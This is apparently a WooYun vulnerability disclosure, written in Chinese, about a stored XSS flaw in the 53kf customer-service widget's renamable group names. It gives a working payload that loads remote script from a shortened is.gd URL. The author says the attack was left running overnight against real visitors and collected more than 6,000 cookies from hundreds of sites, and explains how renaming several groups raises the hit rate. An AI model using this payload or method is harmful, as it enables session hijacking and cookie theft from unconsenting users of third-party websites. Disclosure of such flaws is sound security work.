WooYun.org

53客服
某插件在网页右下角有个企业收藏夹

点开里面有个分组。
而这个分组到底是干什么的，怎么分配的。我现在也没弄清楚
但是它的分组名称是可修改的。
修改名称，插入代码
test"><script src=http://is.gd/wnezNK></script>

但是，审查元素去看代码。发现没有，失败了？

可是实际上我们已经收到cookie了。

挂了一晚上加一个上午，收获颇丰啊O(∩_∩)O哈！
而且进去以后发现中枪的可不是一个域名。
7k7k，华夏名网，59互联，兄弟连+一大堆小站，6千加的cookie，怎么也有几百个网站吧。

根据实现分析一下
当用户访问网站时，53kf会分配一个分组。
53kf 的分组是按照我不知道的条件出现在网页下，而且这个分组是可以跨网站，跨用户。
分组重命名的地方存在xss，
插入代码后，当用户访问网页时，53客服分配的分组如果是被我们插如代码的分组的话，用户就中枪了。
利用的时候，我们可以多改几个分组名，提高分组被系统选中的概率。
影响挺大的，理论上只要是你们的客户就可能中枪。
然后外部js代码都能执行了，你说我们能干什么？